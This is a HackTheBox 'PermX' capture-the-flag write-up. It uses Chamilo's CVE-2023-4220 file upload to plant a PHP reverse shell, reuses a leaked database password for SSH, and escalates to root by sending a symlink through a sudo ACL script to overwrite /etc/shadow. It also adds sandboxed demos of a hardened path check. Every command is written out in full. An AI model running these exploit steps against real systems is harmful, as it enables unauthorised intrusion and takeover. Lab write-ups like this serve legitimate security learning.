Hackthebox - PermX

0x1 Initial Access

  • Nmap scan
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Nothing interesting on port 80: it redirects to permx.htb (add it to /etc/hosts) and serves only a static e-learning landing page
  • Subdomain Enumeration:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb -H "Host: FUZZ.permx.htb" -fw 18
  • Found endpoints:
    • lms.permx.htb
  • The web app is powered by Chamilo, an open-source learning management system
  • Checking robots.txt reveals restricted directories and files
User-Agent: *

# Directories

Disallow: /app/
Disallow: /bin/
Disallow: /documentation/
Disallow: /home/
Disallow: /main/
Disallow: /plugin/
Disallow: /tests/
Disallow: /vendor/

# Files
Disallow: /license.txt
Disallow: /README.txt
Disallow: /whoisonline.php
Disallow: /whoisonlinesession.php
  • /app is browsable and exposes the web application files
  • Chamilo LMS is affected by an unauthenticated arbitrary file upload in its bigUpload component, which gives remote code execution: CVE-2023-4220
  • The presence of /main/inc/lib/javascript/bigupload/inc/bigUpload.php confirms the endpoint targeted by CVE-2023-4220 exists on this install
  • Upload a PHP reverse shell (shell.php) through the unauthenticated endpoint; uploaded files land in .../bigupload/files/
curl -F 'bigUploadFile=@shell.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  • Start a listener (nc -lvnp on the port in shell.php)
  • Trigger the RCE by requesting the uploaded file in a browser or with curl:
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/shell.php'

0x2 www-data

  • /var/www/chamilo/app/config/configuration.php reveals MySQL DB credentials
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo111';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03**********W8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
  • The MySQL database holds the salted bcrypt hashes of the admin and ano users; bcrypt is slow to crack, so this looks like a rabbit hole
  • Since port 22 is open, try reusing the MySQL password against the only account with a home directory in /home, i.e. mtz
  • The DB password works for mtz over SSH

0x3 mtz

  • Log in via SSH as mtz
  • Get user.txt
  • sudo -l shows mtz has sudo privilege on /opt/acl.sh:
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
  • The script lets mtz set ACLs only on files under /home/mtz: the string check rejects any path not starting with /home/mtz/ and any path containing "..", which blocks plain traversal
  • But it only checks the literal path prefix, never the canonical (symlink-resolved) path, and the -f test follows symlinks, so a file reached through a symlink inside /home/mtz passes every check while setfacl operates on the real target
  • So we can create a symbolic link in /home/mtz that points to a sensitive file or directory and reach anything on the filesystem through it
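To make the flaw concrete, here is an added example (not part of the writeup or the box) that reproduces the acl.sh prefix check beside a hardened variant that validates the realpath-resolved target. The base directory is a parameter so the demo runs in a scratch directory instead of the real /home/mtz, the fake shadow file and the symlink are constructed inline, setfacl is never called, and `realpath -e` is assumed to be GNU coreutils.

```shell
#!/bin/sh
# Added example (not from the PermX box or the Chamilo project): the prefix
# check from /opt/acl.sh next to a hardened version that validates the
# canonical path. The base directory is a parameter so the demo runs in a
# scratch directory instead of the real /home/mtz; setfacl is never called.

# Original logic from /opt/acl.sh: string prefix + ".." filter + "-f".
weak_check() {
    base="$1"; target="$2"
    case "$target" in
        "$base"/*) ;;             # literal prefix match on the raw string
        *) return 1 ;;            # "Access denied."
    esac
    case "$target" in *..*) return 1 ;; esac
    [ -f "$target" ] || return 1  # -f follows symlinks, so a link to / still passes
    return 0
}

# Hardened: resolve every symlink with realpath -e (GNU coreutils, all
# components must exist), then apply the prefix test to the resolved path
# against the resolved base directory.
strong_check() {
    base="$1"; target="$2"
    rbase=$(realpath -e -- "$base") || return 1
    real=$(realpath -e -- "$target") || return 1
    case "$real" in
        "$rbase"/*) ;;
        *) return 1 ;;
    esac
    [ -f "$real" ] || return 1
    return 0
}

# Constructed sandbox: a fake /home/mtz, a fake /etc/shadow, and the attacker's
# symlink (stand-in for `ln -s / kitty`). Prints the scratch directory path.
build_sandbox() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/home/mtz" "$tmp/etc"
    printf 'root:*:19742:0:99999:7:::\n' > "$tmp/etc/shadow"
    printf 'notes\n' > "$tmp/home/mtz/notes.txt"
    ln -s "$tmp" "$tmp/home/mtz/kitty"
    printf '%s\n' "$tmp"
}

# Run both checks on a legitimate file and on the symlink-traversed shadow file.
demo() {
    T=$(build_sandbox) || return 1
    B="$T/home/mtz"
    for t in "$B/notes.txt" "$B/kitty/etc/shadow"; do
        if weak_check "$B" "$t"; then w=allowed; else w=denied; fi
        if strong_check "$B" "$t"; then s=allowed; else s=denied; fi
        printf '%-28s weak=%-7s strong=%s\n' "${t#"$T"}" "$w" "$s"
    done
    rm -rf "$T"
}

demo
```

The legitimate file is allowed by both checks; /home/mtz/kitty/etc/shadow is allowed by the original check and denied by the hardened one. Even the hardened check leaves a race between validation and the setfacl call (the link could be repointed in between), so a real fix would also refuse to follow symlinks at all or operate on an opened file descriptor rather than a path.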

0x4 root

  • In /home/mtz, create a symbolic link to the filesystem root
ln -s / kitty
  • Use /opt/acl.sh to grant mtz rwx on /etc/shadow through the link; the string passes the prefix and ".." checks while setfacl acts on the real file
sudo /opt/acl.sh mtz rwx /home/mtz/kitty/etc/shadow
  • Now that the ACL grants write access, we can replace root's password hash with one we generated
  • Use openssl to generate a SHA-512 crypt hash for a password of our choice
openssl passwd -6 kitty
  • Overwrite the shadow file. Note that `>` replaces the whole file with this single line, so every other account loses its entry; editing only root's line (with sed or a text editor) keeps the rest of the file intact
echo 'root:$6$MEVGg8CazLPgX*********************************yI37J6ER0:19742:0:99999:7:::' > /etc/shadow
  • su root with the chosen password now gives a root shell
  • Get root.txt
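As an added example (not from the original writeup), the following replaces only root's hash field in shadow-format text instead of clobbering the whole file, so the other accounts survive. It works on stdin/stdout over a constructed sample; on the box, once the ACL grants write access, the same function would be applied to /etc/shadow and the result written back through a temp file. It assumes awk and, for the demo, openssl.

```shell
#!/bin/sh
# Added example (not from the original writeup): swap only root's hash field
# in shadow-format text so the other accounts keep their entries. Reads
# shadow text from stdin and writes the edited text to stdout.

# Usage: set_root_hash '<crypt hash>' < shadow-text
set_root_hash() {
    # Split on ":", rebuild with ":" as the separator, change field 2 of the
    # root line only, print every line unchanged otherwise.
    awk -F: -v h="$1" 'BEGIN { OFS = ":" } $1 == "root" { $2 = h } { print }'
}

# Constructed sample: root plus two accounts that must survive the edit.
SAMPLE='root:*:19742:0:99999:7:::
daemon:*:19742:0:99999:7:::
mtz:$6$constructed$notarealhash:19742:0:99999:7:::'

demo() {
    # openssl passwd -6 produces a SHA-512 crypt hash, as in the writeup.
    if command -v openssl >/dev/null 2>&1; then
        h=$(openssl passwd -6 kitty)
    else
        h='$6$placeholder$hash'   # openssl absent in this environment; placeholder only
    fi
    printf '%s\n' "$SAMPLE" | set_root_hash "$h"
}

demo
```

The output keeps three lines, with only root's second field changed.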